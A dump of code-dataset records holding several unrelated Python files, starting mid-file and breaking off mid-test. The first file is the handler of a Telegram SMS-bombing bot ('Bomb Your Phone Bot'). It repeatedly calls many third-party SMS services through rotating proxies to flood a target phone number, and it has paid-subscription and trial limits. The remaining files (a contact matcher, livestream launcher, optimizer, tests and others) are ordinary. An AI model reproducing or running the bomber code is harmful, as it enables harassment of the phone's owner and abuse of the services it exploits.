open(f'{__main__.PATH}/user_logs/{attack_id}.txt', 'w', encoding='utf8') as f:\r\n f.write(f'\\n ██████╗ ██████╗ ███╗ ███╗██████╗ ██╗ ██╗ ██████╗ ██╗ ██╗██████╗ \\n'\r\n f' ██╔══██╗██╔═══██╗████╗ ████║██╔══██╗ ╚██╗ ██╔╝██╔═══██╗██║ ██║██╔══██╗\\n'\r\n f' ██████╔╝██║ ██║██╔████╔██║██████╔╝ ╚████╔╝ ██║ ██║██║ ██║██████╔╝\\n'\r\n f' ██╔══██╗██║ ██║██║╚██╔╝██║██╔══██╗ ╚██╔╝ ██║ ██║██║ ██║██╔══██╗\\n'\r\n f' ██████╔╝╚██████╔╝██║ ╚═╝ ██║██████╔╝ ██║ ╚██████╔╝╚██████╔╝██║ ██║\\n'\r\n f' ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝\\n'\r\n f' ██████╗ ██╗ ██╗ ██████╗ ███╗ ██╗███████╗ ██████╗ ██████╗ ████████╗\\n'\r\n f' ██╔══██╗██║ ██║██╔═══██╗████╗ ██║██╔════╝ ██╔══██╗██╔═══██╗╚══██╔══╝\\n'\r\n f' ██████╔╝███████║██║ ██║██╔██╗ ██║█████╗ ██████╔╝██║ ██║ ██║ \\n'\r\n f' ██╔═══╝ ██╔══██║██║ ██║██║╚██╗██║██╔══╝ ██╔══██╗██║ ██║ ██║ \\n'\r\n f' ██║ ██║ ██║╚██████╔╝██║ ╚████║███████╗ ██████╔╝╚██████╔╝ ██║ \\n'\r\n f' ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ \\n\\n')\r\n\r\n\r\ndef get_attack_stop_time(meta: dict, timeout: int, pause: int, cycles: int):\r\n quantity_services = len(tools.load_services().items())\r\n _time = int((((timeout / 3) + pause) * quantity_services * cycles) / 180)\r\n stop_time_timestamp = int(meta['started']) + (_time * 51)\r\n formatted = datetime.datetime.fromtimestamp(stop_time_timestamp, pytz.timezone(\r\n 'Europe/Moscow'\r\n )).strftime(\"%H:%M:%S MSK\")\r\n return '* ' + formatted\r\n\r\n\r\nasync def attack(message: types.Message, meta: dict, from_user: int):\r\n global active_grabber\r\n global active_gays\r\n\r\n await log(meta)\r\n\r\n attack_id = meta['attack_id']\r\n code = meta['code']\r\n number = meta['number']\r\n formatted = meta['formatted']\r\n formatted_title = meta['formatted_title']\r\n cycles = meta['cycles']\r\n operator = meta['operator']\r\n country = meta['country']\r\n region = meta['region']\r\n attack_start_time = datetime.datetime.fromtimestamp(meta['started'], pytz.timezone(\r\n 'Europe/Moscow'\r\n )).strftime(\"%H:%M:%S MSK\")\r\n\r\n user_logger(attack_id, str(), str(), True)\r\n\r\n latest_edited = datetime.datetime.timestamp(datetime.datetime.now())\r\n\r\n referer = 'Proxoid.net'\r\n\r\n user_dump = database.get_user(from_user)\r\n proxy_status = random.choice([True, False]) if user_dump['settings']['proxy_status'] else False\r\n proxy_status_formatted = f'Прокси от {referer}' if proxy_status else 'Прямое'\r\n pause = user_dump['settings']['pause']\r\n timeout = user_dump['settings']['timeout']\r\n\r\n client = get_client(proxy_status)\r\n\r\n services_completed = 0\r\n sms_send = 0\r\n failed_sms = 0\r\n all_sms = len(tools.load_services().items()) * cycles\r\n\r\n kb = types.InlineKeyboardMarkup()\r\n button = types.InlineKeyboardButton(\r\n 'Остановить атаку ⛔',\r\n callback_data=f\"stop_attack {from_user}\"\r\n )\r\n kb.row(button)\r\n\r\n active_gays.append(from_user)\r\n\r\n if len(database.get_proxys()) < config.min_proxys and not active_grabber:\r\n active_grabber = True\r\n threading.Thread(target=proxy_grabber.grab, args=(logger, database,\r\n config.proxoid_token)\r\n ).start()\r\n\r\n # formatted = meta['formatted']\r\n # cycles = meta['cycles']\r\n # operator = meta['operator']\r\n # country = meta['country']\r\n # region = meta['region']\r\n\r\n user_logger(attack_id, 'Bomb Your Phone Bot', 'Initialization...\\n'\r\n f'ATTACK_ID: {attack_id}\\n'\r\n f'PHONE: {formatted}\\n'\r\n f'CYCLES: {cycles}\\n'\r\n f'TIMEOUT: {timeout}s\\n'\r\n f'PAUSE: {pause}s\\n'\r\n f'PHONE_COUNTRY: {country}\\n'\r\n f'PHONE_REGION: {region}\\n'\r\n f'PHONE_OPERATOR: {operator}')\r\n\r\n for cycle in range(1, cycles + 1):\r\n if from_user not in active_gays:\r\n user_logger(attack_id, 'Bomb Your Phone Bot', 'Attack stopped by user.')\r\n break\r\n\r\n user_logger(attack_id, 'Bomb Your Phone Bot', f'Cycle {cycle} started!')\r\n for module, service in tools.load_services().items():\r\n services_completed += 1\r\n\r\n if from_user not in active_gays:\r\n break\r\n\r\n if (datetime.datetime.timestamp(datetime.datetime.now()) - latest_edited) >= 15:\r\n try:\r\n latest_edited = datetime.datetime.timestamp(datetime.datetime.now())\r\n progressbar = tools.generate_progressbar(sms_send + failed_sms, all_sms)\r\n\r\n user_logger(attack_id, 'Bomb Your Phone Bot', 'Message updated.')\r\n await message.edit_text(generate_attack_message(formatted_title, 'В работе!',\r\n proxy_status_formatted, attack_id, cycles,\r\n country, region, operator, sms_send, cycle - 1,\r\n progressbar, attack_start_time,\r\n get_attack_stop_time(meta, timeout, pause,\r\n cycles - cycle - 1)),\r\n parse_mode='html', reply_markup=kb, disable_web_page_preview=True)\r\n except exceptions.MessageNotModified:\r\n pass\r\n try:\r\n await asyncio.sleep(pause)\r\n await getattr(module, service)(str(number), str(code), timeout, client).run()\r\n sms_send += 1\r\n user_logger(attack_id, service, f'Sent! ({sms_send}/{failed_sms})')\r\n except (ValueError, AttributeError, Exception):\r\n user_logger(attack_id, service, f'Not sent! Caused by {sys.exc_info()[0].__name__} '\r\n f'({sms_send}/{failed_sms})')\r\n failed_sms += 1\r\n try:\r\n await client.close()\r\n except (BaseException, Exception):\r\n pass\r\n proxy_status = random.choice([True, False]) if user_dump['settings']['proxy_status'] else False\r\n proxy_status_formatted = f'Прокси от {referer}' if proxy_status else 'Прямое'\r\n user_logger(attack_id, 'Bomb Your Phone Bot', 'Reconnecting...')\r\n client = get_client(proxy_status)\r\n continue\r\n\r\n try:\r\n await client.close()\r\n except (BaseException, Exception):\r\n pass\r\n\r\n progressbar = tools.generate_progressbar(sms_send + failed_sms, all_sms)\r\n\r\n kb = types.InlineKeyboardMarkup()\r\n button = types.InlineKeyboardButton(\r\n 'Отправить логи 💾',\r\n callback_data=f\"send_logs {attack_id}\"\r\n )\r\n kb.row(button)\r\n\r\n user_logger(attack_id, 'Bomb Your Phone Bot', 'Attack finished!')\r\n await message.edit_text(generate_attack_message(formatted_title, 'Завершено.', proxy_status_formatted,\r\n attack_id, cycles, country, region, operator,\r\n sms_send, cycles, progressbar, attack_start_time,\r\n tools.get_formatted_time()),\r\n parse_mode='html', reply_markup=kb,\r\n disable_web_page_preview=True)\r\n\r\n if from_user in active_gays:\r\n active_gays.remove(from_user)\r\n\r\n\r\n@dp.callback_query_handler(lambda e: e.data.startswith('send_logs'))\r\nasync def start_callback(callback_query: types.CallbackQuery):\r\n logger('Button', f'{tools.get_full_name(callback_query)} with id {callback_query.from_user.id} '\r\n f'press button {callback_query.data}')\r\n\r\n try:\r\n attack_id = callback_query.data.split(' ', maxsplit=1)[1]\r\n except (BaseException, Exception):\r\n return\r\n\r\n try:\r\n document = open(f'{__main__.PATH}/user_logs/{attack_id}.txt', 'rb')\r\n await callback_query.answer('Логи отправлены! Они придут в течении минуты.', True)\r\n return await bot.send_document(chat_id=callback_query.from_user.id,\r\n document=document)\r\n except (BaseException, Exception):\r\n await callback_query.answer('К сожалению, мы не нашли логи для этой атаки.', True)\r\n\r\n\r\n@dp.callback_query_handler(lambda e: e.data.startswith('unban_user'))\r\nasync def start_callback(callback_query: types.CallbackQuery):\r\n logger('Button', f'{tools.get_full_name(callback_query)} with id {callback_query.from_user.id} '\r\n f'press button {callback_query.data}')\r\n\r\n try:\r\n user = int(callback_query.data.split(' ', maxsplit=1)[1])\r\n except (BaseException, Exception):\r\n return\r\n\r\n dump = database.get_user(callback_query.from_user.id)\r\n\r\n if not database.get_user(user)['ban_status']:\r\n try:\r\n return await callback_query.answer(f'Уже лив инсайд!', True)\r\n except exceptions.InvalidQueryID:\r\n return\r\n\r\n text = (\"NEW UNBAN!\\n\\n\"\r\n f'Admin: {dump[\"full_name\"]}\\n'\r\n f'UnBanned: user\\n'\r\n f'UserID: {user}')\r\n text += f'\\nUsername: @{database.get_user(user)[\"user_name\"]}' if database.get_user(user)[\"user_name\"] != \"\" else \"\"\r\n\r\n try:\r\n await bot.send_message(config.attacks_logs, text, parse_mode='html')\r\n except exceptions.ChatNotFound:\r\n pass\r\n\r\n database.unban_user(user)\r\n\r\n try:\r\n misc.gays.remove(user)\r\n except (BaseException, Exception):\r\n pass\r\n\r\n text = f'Вы были разблокированы администратором {dump[\"full_name\"]}.'\r\n\r\n try:\r\n await bot.send_message(user, text, parse_mode='html')\r\n except (Exception, BaseException):\r\n pass\r\n\r\n try:\r\n return await callback_query.answer(f'Пользователь {user} разбанен!', True)\r\n except exceptions.InvalidQueryID:\r\n return\r\n\r\n\r\n@dp.callback_query_handler(lambda e: e.data.startswith('ban_user'))\r\nasync def start_callback(callback_query: types.CallbackQuery):\r\n logger('Button', f'{tools.get_full_name(callback_query)} with id {callback_query.from_user.id} '\r\n f'press button {callback_query.data}')\r\n\r\n try:\r\n user = int(callback_query.data.split(' ', maxsplit=1)[1])\r\n except (BaseException, Exception):\r\n return\r\n\r\n dump = database.get_user(callback_query.from_user.id)\r\n\r\n if database.get_user(user)['ban_status']:\r\n try:\r\n return await callback_query.answer(f'Уже дед инсайд!', True)\r\n except exceptions.InvalidQueryID:\r\n return\r\n\r\n text = (\"NEW BAN!\\n\\n\"\r\n f'Admin: {dump[\"full_name\"]}\\n'\r\n f'Banned: user\\n'\r\n f'UserID: {user}')\r\n text += f'\\nUsername: @{database.get_user(user)[\"user_name\"]}' if database.get_user(user)[\"user_name\"] != \"\" else \"\"\r\n kb = types.InlineKeyboardMarkup()\r\n button1 = types.InlineKeyboardButton(\r\n \"Разбанить\",\r\n callback_data=f\"unban_user {user}\"\r\n )\r\n button2 = types.InlineKeyboardButton(\r\n 'Профиль',\r\n callback_data=f\"get_profile {user}\"\r\n )\r\n button3 = types.InlineKeyboardButton(\r\n 'Профиль админа',\r\n callback_data=f\"get_profile {callback_query.from_user.id}\"\r\n )\r\n\r\n kb.row(button1, button2)\r\n kb.row(button3)\r\n\r\n try:\r\n await bot.send_message(config.attacks_logs, text, reply_markup=kb, parse_mode='html')\r\n except exceptions.ChatNotFound:\r\n pass\r\n\r\n database.ban_user(user)\r\n\r\n text = f'Вы были заблокированы администратором {dump[\"full_name\"]}. Для ' \\\r\n f'разблокировки, пожалуйста, ' \\\r\n f'обратитесь в тех. поддержку (@{config.support}). ' \\\r\n f'Ваш персональный код - {user}'\r\n\r\n misc.gays.append(user)\r\n\r\n try:\r\n await bot.send_message(user, text, parse_mode='html')\r\n except (Exception, BaseException):\r\n pass\r\n\r\n try:\r\n return await callback_query.answer(f'Пользователь {user} забанен!', True)\r\n except exceptions.InvalidQueryID:\r\n return\r\n\r\n\r\n@dp.callback_query_handler(lambda e: e.data.startswith('get_profile'))\r\nasync def start_callback(callback_query: types.CallbackQuery):\r\n logger('Button', f'{tools.get_full_name(callback_query)} with id {callback_query.from_user.id} '\r\n f'press button {callback_query.data}')\r\n\r\n try:\r\n user = int(callback_query.data.split(' ', maxsplit=1)[1])\r\n except (BaseException, Exception):\r\n return\r\n\r\n text = start_message.generate_profile_text(user)\r\n\r\n await bot.send_message(callback_query.from_user.id, text, parse_mode='html')\r\n\r\n try:\r\n return await callback_query.answer(f'Профиль пользователя {user} отправлен!', True)\r\n except exceptions.InvalidQueryID:\r\n return\r\n\r\n\r\n@dp.callback_query_handler(lambda e: e.data.startswith('stop_attack'))\r\nasync def start_callback(callback_query: types.CallbackQuery):\r\n logger('Button', f'{tools.get_full_name(callback_query)} with id {callback_query.from_user.id} '\r\n f'press button {callback_query.data}')\r\n\r\n try:\r\n from_user = int(callback_query.data.split(' ', maxsplit=1)[1])\r\n except (BaseException, Exception):\r\n return\r\n\r\n try:\r\n active_gays.remove(from_user)\r\n except (Exception, BaseException):\r\n pass\r\n\r\n try:\r\n return await callback_query.answer('Атака остановлена! Сообщение обновится в течении минуты.', True)\r\n except exceptions.InvalidQueryID:\r\n return\r\n\r\n\r\n@dp.message_handler(content_types=['text'])\r\nasync def text_handler(message: types.Message):\r\n if not await thinker(message):\r\n return\r\n\r\n dump = get_user(message.from_user.id)\r\n checker = check_bomber(message, dump['settings']['default_cycles'])\r\n\r\n trial = not dump['sub_status']\r\n max_cycles = config.trial_cycles_count if trial else config.sub_cycles_count\r\n\r\n if not checker:\r\n text = 'Номер недействителен. ' \\\r\n 'Для получения информации об ' \\\r\n 'использовании бота, пожалуйста, ' \\\r\n 'используйте помощь.'\r\n\r\n reply_message = await message.reply(text, parse_mode='html')\r\n await asyncio.sleep(15)\r\n await reply_message.delete()\r\n return await message.delete()\r\n\r\n full_phone = tools.get_full_number(checker['code'], checker['number'])\r\n\r\n if trial and dump['trial_start_count'] < 1:\r\n text = 'К сожалению, ваш пробный период закончился. ' \\\r\n 'Для возобновления доступа к боту, пожалуйста, ' \\\r\n 'перейдите во вкладку \"Донат\" стартового сообщения.'\r\n\r\n reply_message = await message.reply(text, parse_mode='html')\r\n await asyncio.sleep(15)\r\n await reply_message.delete()\r\n return await message.delete()\r\n\r\n if checker['cycles'] > max_cycles:\r\n text = f'К сожалению, вы не можете использовать ' \\\r\n f'более {max_cycles} циклов. Для получения более ' \\\r\n f'подробной информации посетите вкладку \"Профиль\" ' \\\r\n f'стартового сообщения'\r\n\r\n reply_message = await message.reply(text, parse_mode='html')\r\n await asyncio.sleep(15)\r\n await reply_message.delete()\r\n return await message.delete()\r\n\r\n if full_phone in get_users()['attached_phone_numbers']:\r\n text = f'К сожалению, вы не можете запустить спам на ' \\\r\n f'данный номер телефона, так как его владелец имеет ' \\\r\n f'подписку в нашем боте'\r\n\r\n reply_message = await message.reply(text, parse_mode='html')\r\n await asyncio.sleep(15)\r\n await reply_message.delete()\r\n return await message.delete()\r\n\r\n if checker['code'] not in config.available_phone_codes:\r\n text = f'К сожалению, вы не можете запустить спам на ' \\\r\n f'данный номер телефона, так как операторы ' \\\r\n f'данной страны не обслуживаются'\r\n\r\n reply_message = await message.reply(text, parse_mode='html')\r\n await asyncio.sleep(15)\r\n await reply_message.delete()\r\n return await message.delete()\r\n\r\n if message.from_user.id in active_gays:\r\n text = f'К сожалению, вы не можете запустить спам ' \\\r\n f'на более одного номера одновременно. Пожалуйста, завершите ' \\\r\n f'предыдущую атаку.'\r\n\r\n reply_message = await message.reply(text, parse_mode='html')\r\n await asyncio.sleep(15)\r\n await reply_message.delete()\r\n return await message.delete()\r\n\r\n kb = types.InlineKeyboardMarkup()\r\n kb.row(types.InlineKeyboardButton(\r\n \"Wait... 🔙\",\r\n callback_data=\"passed\"\r\n ))\r\n\r\n reply_message = await message.reply(generate_attack_message(checker['formatted'], 'Ожидание...', 'Неизвестно',\r\n checker['attack_id'], checker['cycles'],\r\n checker['country'],\r\n checker['region'], checker['operator'], 0, 0,\r\n tools.generate_progressbar(0, 100),\r\n tools.get_formatted_time(), 'Неизвестно'),\r\n parse_mode='html', reply_markup=kb)\r\n\r\n checker['started'] = tools.get_time()\r\n\r\n if trial:\r\n database.minus_attack(message.from_user.id)\r\n\r\n await attack(reply_message, checker, message.from_user.id)\r\n","sub_path":"handlers/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":27621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"10151107","text":"#!/usr/bin/env python3\n\nimport logging\nimport unicodedata\nfrom collections import Counter\n\nfrom pylev3 import Levenshtein\n\n\ndef find_best_match(input_str, tab):\n normalized_input_str = _normalize(input_str)\n normalized_tab = [_normalize(item) for item in tab]\n result = Levenshtein.wfi([item[0: len(normalized_input_str)] for item in normalized_tab], normalized_input_str)\n\n grouped_list = Counter(result)\n distance_between_contacts = max(grouped_list.keys()) - min(grouped_list.keys())\n minimums_count = grouped_list[min(grouped_list.keys())]\n\n if (distance_between_contacts < 4) or (minimums_count > 3):\n raise Exception(\"No Contact named %s found\" % input_str)\n\n else:\n index = result.index(min(result))\n logging.info(\"Contact found %s\" % tab[index])\n return tab[index]\n\n\ndef _normalize(input_str):\n nkfd_form = unicodedata.normalize('NFKD', input_str)\n return (\"\".join([c for c in nkfd_form if not unicodedata.combining(c)])).lower()\n","sub_path":"contact_finder.py","file_name":"contact_finder.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"31435606","text":"import pema\nimport os\nimport straxen\nimport wfsim\n\nname = 'kr'\nbase_dir = '/dali/lgrandi/angevaare/wfsims/pema'\n\n# Fixed\ndata_name = f'pema_w{wfsim.__version__}_p{pema.__version__}'\nfig_dir = os.path.join(base_dir, f'figures_summary_{data_name}')\ndata_dir = os.path.join(base_dir, name, 'processed_data')\nraw_data_dir = os.path.join(base_dir, 'raw_data')\ninstructions_csv = f\"./inst_{data_name}.csv\"\n\n# You need this for setting up the dali-jobs\nenviron_init = '''eval \"$(/home/angevaare/software/Miniconda3/bin/conda shell.bash hook)\"\nconda activate strax\nexport PATH=/home/angevaare/software/Miniconda3/envs/strax/bin:$PATH'''\n\n# Output naming\ndefault_label = 'Normal clustering'\ncustom_label = 'Changed clustering'\n\n# Take a few arbitrary runs that allow to run jobs in parallel and get the \n# gains from CMT\nrun_list = list(f'{r:06}' for r in range(18750, 18750 + 15))\n\n# Just some id which allows CMT to load\nrun_id = run_list[0]\n\n# setting up instructions like this may take a while. You can set e.g. \ninstructions = dict(\n event_rate=5, # Don't make too large -> overlapping truth info\n chunk_size=5, # keep large -> less overhead but takes more RAM\n nchunk=100, # set to 100\n photons_low=1, # PE\n photons_high=100, # PE\n electrons_low=1, #\n electrons_high=100,\n tpc_radius=straxen.tpc_r,\n tpc_length=straxen.tpc_z, # TPC length approx\n drift_field=straxen.get_resource('fax_config_nt_low_field.json', fmt='json').get('drift_field'),\n timing='uniform', # Double S1 peaks uniform over time\n)\n\npema.inst_to_csv(\n instructions,\n instructions_csv,\n get_inst_from=pema.kr83_instructions)\n\nconfig_update = dict(\n detector='XENONnT',\n fax_file=os.path.abspath(instructions_csv),\n fax_config='fax_config_nt_low_field.json',\n)\n","sub_path":"notebooks/setup_kr.py","file_name":"setup_kr.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"46739778","text":"from fastapi import FastAPI\nfrom fastapi.responses import HTMLResponse, JSONResponse\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.encoders import jsonable_encoder\nfrom pydantic import BaseModel\nimport json\n\nfrom fake_boat import FakeBoat\n\nboat = FakeBoat()\napp = FastAPI()\napp.mount(\"/static\", StaticFiles(directory=\"static\"), name=\"static\")\n\n\nclass Item(BaseModel):\n speed: int\n angle: int\n led1: bool\n led2: bool\n\n\n@app.get(\"/\")\nasync def root():\n page = \"\"\n with open(\"index.html\") as f:\n page = f.read()\n return HTMLResponse(content=page)\n\n\n@app.post(\"/control\")\nasync def root(item: Item):\n data = item\n boat.set_led(data.led1, 0)\n boat.set_led(data.led2, 1)\n boat.set_speed(data.speed)\n boat.set_angle(data.angle)\n return {\"message\": \"Set: \"+str(boat)}\n\n\n@app.get(\"/telemetry\")\nasync def root():\n response = {\"speed\": boat.get_speed(),\n \"angle\": boat.get_angle(),\n \"led1\": boat.get_led(0),\n \"led2\": boat.get_led(1)}\n print(\"sending telemetry: \", response)\n #return JSONResponse(content=jsonable_encoder(response))\n return HTMLResponse(content=json.dumps(response))\n\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"569887487","text":"#!python2\n\nimport argparse\nimport logging\nfrom subprocess import Popen\nimport json\nfrom livestreamer import streams as livestreamer_stream\nfrom stream_lib import Streams\nfrom configparser import SafeConfigParser, ParsingError\nfrom shutil import copy\nimport webbrowser\nfrom movewindows import WindowsPosition\nimport time\n\n\n# Reading and loading configs\ntry:\n conf = SafeConfigParser()\n conf.read('E:\\code\\stream-check\\config.ini')\n STREAM_LIST_PATH = conf.get('stream_dict', 'path')\n STREAM_BACKUP_PATH = conf.get('stream_dict', 'backup')\n TEXT_PATH = conf.get('massiveadd', 'path')\n LOG_PATH = conf.get('log', 'path')\n FORMATTER = '%(asctime)-15s | %(levelname)-8s \\n %(message)-8s'\n logging.basicConfig(\n filename=LOG_PATH, level=logging.INFO, format=FORMATTER)\n logging.getLogger(\"requests\").setLevel(logging.WARNING)\n browser = webbrowser.get('windows-default')\nexcept ParsingError as e:\n print(\"Couldn't parse because {}\".format(e))\n\n\ndef open_dict():\n with open(STREAM_LIST_PATH) as f:\n logging.info('Opening dictionary')\n read_dict = json.load(f)\n stream_dict = Streams(read_dict)\n return stream_dict\n\n\ndef add_streams(url, game):\n stream_dict = open_dict()\n stream_dict.addStream(game.upper(), str(url))\n try:\n copy(STREAM_LIST_PATH, STREAM_BACKUP_PATH)\n logging.info('Backing up stream list at {}'.format(STREAM_BACKUP_PATH))\n except Exception as e:\n logging.error('Backup failed: {}'.format(e))\n with open(STREAM_LIST_PATH, 'w') as f:\n json.dump(stream_dict.streams, f)\n logging.info('Added url: {} \\n category: {}'.format(url, game))\n\n\ndef check_stream(url):\n try:\n if livestreamer_stream(url):\n return True\n else:\n return False\n except Exception as e:\n if args.verbose:\n logging.error('Couldnt open: {} ({})'.format(url, e))\n else:\n logging.error('Couldnt open: {}'.format(url))\n\n\ndef open_livestreamer(stream_urls, quality, verbose, chat, monitor):\n for stream_url in stream_urls:\n if check_stream(stream_url):\n if chat:\n webbrowser.open_new_tab(\n '{}/{}'.format(str(stream_url), 'chat'))\n\n #vod mode, makes possible to skip the time\n try:\n int(str(stream_url).split('/')[-1]) \n Popen(\n 'livestreamer {} {} -Q --player-passthrough=hls'.format(str(stream_url), quality), shell=verbose)\n #normal mode\n except ValueError: \n Popen(\n 'livestreamer {} {} -Q '.format(str(stream_url), quality), shell=verbose)\n\n logging.info('Opening: {} \\n Quality: {} \\n verbose: {}'.format(\n stream_url, quality, verbose))\n\n time.sleep(16)\n windows = WindowsPosition()\n windows.move(monitor)\n\n\ndef massive_add(text):\n with open(text, 'r') as f:\n lines = [line.strip() for line in f.readlines()]\n for line in lines:\n if line == line.upper():\n game = line\n else:\n url = line.split()\n add_streams(''.join(url[1::3]), game)\n\n\ndef main(game=None, quality='source', verbose=True, chat=False, monitor='monitor1'):\n streams = open_dict()\n if game == None:\n for stream in streams:\n open_livestreamer(stream, quality, verbose, chat, monitor)\n else:\n for game_category in game:\n open_livestreamer(\n streams[game_category.upper()], quality, verbose, chat, monitor)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Game streams to open')\n parser.add_argument(\n '--single', '-s', help='opens a single stream', action=\"store\")\n parser.add_argument( \n '--multi', '-m', help=\"open multiple streams\", nargs='*', action=\"store\")\n parser.add_argument(\n '--add', '-a', help=\"add stream to the list URL GAME\", nargs=2, action=\"store\")\n parser.add_argument(\n '-v', '--verbose', help=\"Makes cmd windows appear\", action=\"store_true\")\n parser.add_argument(\n '-c', '--chat', help=\"Opens twitch chat if available\", action=\"store_true\")\n parser.add_argument(\n '--quality', '-q', help='Chooses the quality to open streams, default = source', default='source')\n parser.add_argument(\n '--monitor', '-mn', help='Chooses the monitor to open, default = monitor1, n (see movewindows.py)', default='monitor1', action=\"store\")\n args = parser.parse_args()\n verbose = False if args.verbose else True\n chat = True if args.chat else False\n if args.single:\n open_livestreamer(\n [args.single], args.quality, verbose, chat, args.monitor)\n elif args.multi:\n main(args.multi, args.quality, verbose, chat, args.monitor)\n elif args.add:\n add_streams(args.add[0], args.add[1])\n else:\n main()\n","sub_path":"streamcheck-old.py","file_name":"streamcheck-old.py","file_ext":"py","file_size_in_byte":4974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"146283244","text":"from __future__ import print_function\nimport argparse\nimport os\nimport random\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nfrom torch.autograd import Variable\nfrom datasets import PartDataset\nfrom pointnet import PointNetDenseCls\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\nfrom show3d_balls import *\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--batchSize', type=int, default=1, help='input batch size')\nparser.add_argument('--workers', type=int, help='number of data loading workers', default=0)\nparser.add_argument('--nepoch', type=int, default=30, help='number of epochs to train for')\nparser.add_argument('--outf', type=str, default='seg', help='output folder')\nparser.add_argument('--model', type=str, default= './seg/seg_model_29_0.810.pth', help='model path')\n\n\nopt = parser.parse_args()\nprint (opt)\n\nopt.manualSeed = random.randint(1, 2500) # fix seed\nprint(\"Random Seed: \", opt.manualSeed)\nrandom.seed(opt.manualSeed)\ntorch.manual_seed(opt.manualSeed)\n\nnum_points = 2700\n\ntest_dataset = PartDataset(root = 'shapenetcore_partanno_segmentation_benchmark_v0', npoints=num_points, classification=False, class_choice=['tools'], train=False)\ntestdataloader = torch.utils.data.DataLoader(test_dataset, batch_size=opt.batchSize,\n shuffle=True, num_workers=int(opt.workers))\nprint(len(test_dataset))\n\nnum_classes = 10\nprint('classes', num_classes)\ntry:\n os.makedirs(opt.outf)\nexcept OSError:\n pass\n\nblue = lambda x:'\\033[94m' + x + '\\033[0m'\n\n\nclassifier = PointNetDenseCls(num_points=num_points, k=num_classes)\nclassifier.load_state_dict(torch.load(opt.model))\n# classifier.cuda()\nclassifier.eval()\n\nnum_test_batch = len(test_dataset)/opt.batchSize\n\ncmap = plt.cm.get_cmap(\"hsv\", 5)\ncmap = np.array([cmap(i) for i in range(10)])[:,:3]\n\ncorrect_percents = []\nfor i, data in enumerate(testdataloader, 0):\n points_np, target = data\n points, target = Variable(points_np), Variable(target)\n points = points.transpose(2, 1)\n # points, target = points.cuda(), target.cuda()\n\n pred, _ = classifier(points)\n pred = pred.view(-1, num_classes)\n target = target.view(-1,1)[:,0] - 1\n\n pred_choice = pred.data.max(1)[1]\n correct = pred_choice.eq(target.data).cpu().sum()\n correct_percent = correct.item()/float(list(target.shape)[0])\n correct_percents.append(correct_percent)\n print('[%d/%d] accuracy: %f' %(i, num_test_batch, correct_percent))\n\n pred_color = cmap[pred_choice.numpy()[0], :]\n showpoints(points_np, None, pred_color, ballradius=4)\naverage_correct_percent = np.sum(correct_percents) / len(correct_percents)\nprint('Average accuracy: %f' % (correct_percent))\n","sub_path":"test_seg.py","file_name":"test_seg.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"64609516","text":"import numpy as np\nfrom optimizer.Optimizer import Optimizer\n\n\nclass RmsProp(Optimizer):\n def __init__(self, learning_rate=0.01, decay_rate=0.99):\n self.learning_rate = learning_rate\n self.decay_rate = decay_rate\n self.h = None\n\n def update(self, params, grads):\n if self.h is None:\n self.h = {}\n for key, val in params.items():\n self.h[key] = np.zeros_like(val)\n\n for key in params.keys():\n self.h[key] = self.decay_rate * self.h[key] + (1 - self.decay_rate) * grads[key] * grads[key]\n params[key] -= self.learning_rate * grads[key] / (np.sqrt(self.h[key]) + 1e-7)\n","sub_path":"optimizer/RmsProp.py","file_name":"RmsProp.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"327046041","text":"\"\"\"\nUnit tests for publication_objects.py\n\"\"\"\n\n# pylint: disable=no-member, missing-docstring, len-as-condition\nimport logging\n\nimport pytest\n\nfrom bibliom.publication_objects import Paper, Author, Journal, Citation\nfrom bibliom.dbtable import DBTable\nfrom bibliom import exceptions\n\n@pytest.mark.usefixtures('class_manager')\nclass TestPaper():\n \"\"\"\n Unit tests for Paper class.\n \"\"\"\n def test_init(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_init')\n new_paper = Paper(manager=self.manager)\n assert isinstance(new_paper, Paper)\n assert not new_paper.was_retracted\n\n paper_table = DBTable.get_table_object('paper', self.manager)\n new_paper = Paper(table=paper_table)\n assert isinstance(new_paper, Paper)\n assert not new_paper.was_retracted\n\n new_paper = Paper(\n table=paper_table,\n fields_dict={\n 'title': \"A New Paper\",\n 'doi': \"10.1231/12312\"\n })\n assert new_paper.title == \"A New Paper\"\n assert new_paper.doi == \"10.1231/12312\"\n\n paper = Paper(\n table=paper_table,\n row_key='idpaper' + DBTable.KEY_STR_DELIMITER + '1'\n )\n assert paper.title\n \n def test_fetch(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_fetch')\n paper = Paper.fetch(\n manager=self.manager,\n where_dict={'doi': '10.1016/j.ijhydene.2016.06.178'}\n )\n assert paper.title == (\n 'Plasma equilibrium reconstruction for the nuclear fusion of ' +\n 'magnetically confined hydrogen isotopes'\n )\n paper = Paper.fetch(where_dict={'doi': '10.1016/j.ijhydene.2016.06.178'})\n assert 